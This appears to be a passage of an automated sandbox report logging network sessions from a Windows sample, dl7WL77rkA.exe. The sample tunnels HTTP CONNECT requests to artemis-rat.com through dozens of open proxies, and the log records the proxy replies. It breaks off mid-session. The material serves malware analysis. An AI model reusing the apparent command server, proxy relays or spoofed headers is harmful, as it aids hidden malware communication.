                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1279192.168.2.553411103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.203449011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1280192.168.2.551830154.118.228.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.213255882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1281192.168.2.553422138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.222978115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092528105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1282192.168.2.553502152.32.187.16481183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.223671913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.822922945 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1283192.168.2.553415111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.223809004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1284192.168.2.552862206.189.145.23598673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.224260092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939275026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.997054100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083513021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108254910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1285192.168.2.55286992.205.61.38241833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.225617886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1286192.168.2.553489103.166.141.74200743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238193035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.593506098 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1287192.168.2.553509147.28.145.213100023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238383055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.457787037 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1288192.168.2.55344460.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238774061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1289192.168.2.55344994.20.183.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.238780975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.621969938 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1290192.168.2.55348751.161.131.84630553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.242630005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.044800997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238976955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1291192.168.2.55343746.209.54.11080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.246335030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.685859919 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:54.819996119 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:55.919358969 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:57.222191095 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:59.680109978 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:04.677460909 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:14.673978090 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:34.487804890 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:34:14.194001913 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 735
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1292192.168.2.553424113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.256616116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1293192.168.2.552898185.132.179.7231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.266498089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.266673088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405417919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462964058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.930130959 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1294192.168.2.55353435.185.196.3831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.268444061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.480669022 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1295192.168.2.552929119.196.168.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.270539999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.570518970 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1296192.168.2.55295492.205.110.11834143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.272221088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.404846907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405580044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462977886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1297192.168.2.55352251.222.241.157403513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.290503025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939038038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1298192.168.2.55353138.162.23.23031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.291800976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.740510941 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1299192.168.2.553004162.215.219.157481173876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.293189049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
